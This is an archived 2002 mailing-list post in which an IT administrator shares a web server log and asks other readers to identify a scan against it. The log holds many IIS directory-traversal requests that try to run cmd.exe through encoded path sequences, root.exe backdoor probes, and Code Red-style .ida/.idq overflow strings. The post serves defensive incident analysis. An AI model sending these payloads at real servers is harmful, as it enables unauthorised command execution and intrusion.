[Dshield] Okay, I'm stumped.

Preston G. Simpson preston.simpson at sfrlaw.com
Wed May 8 16:41:42 GMT 2002


	Doing more digging through the log entries, I find this *long* sequence
(apologies in advance for the length): 

-- BEGIN EXCERPT --

209.195.62.146 - - [27/Apr/2002:12:12:54 -0400] "GET /galaxy_39604.39950
HTTP/1.0" 404 212 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:55 -0400] "HEAD
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:55 -0400] "HEAD
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 200 -
"-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:55 -0400] "HEAD
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 200 -
"-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0"
200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0"
400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 200
- "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400
0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/msadc/root.exe?/c+dir HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:58 -0400] "HEAD
/scripts/root.exe?/c+dir+C:\ HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:58 -0400] "HEAD
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 200 -
"-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "GET /NULL.printer
HTTP/1.1" 404 218 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "GET
/NULL.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=a HTTP/1.0"
404 202 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:13:00 -0400] "GET /NULL.idq?HTTP/1.1
404 Not
FouAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=a HTTP/1.0" 404 202 "-" "-"

-- END EXCERPT --

	I've been looking online for a while, trying to find out what exactly
this is. Evidently it's showing up in other logs as well, but I can't seem
to find a description of what this is anywhere. Does anyone know what this
is? It looks like some sort of strange Nimda/Code Red hybrid, but there
are other things in there that I don't recognize from
either one.
	I would be tempted to say that it's an attack script, except that
the initial line (GET /galaxy_39604.39950 [...]) isn't always the same
in the examples I've seen. Ideas?

--Preston G. Simpson
  IS Services
  preston.simpson at sfrlaw.com




More information about the list mailing list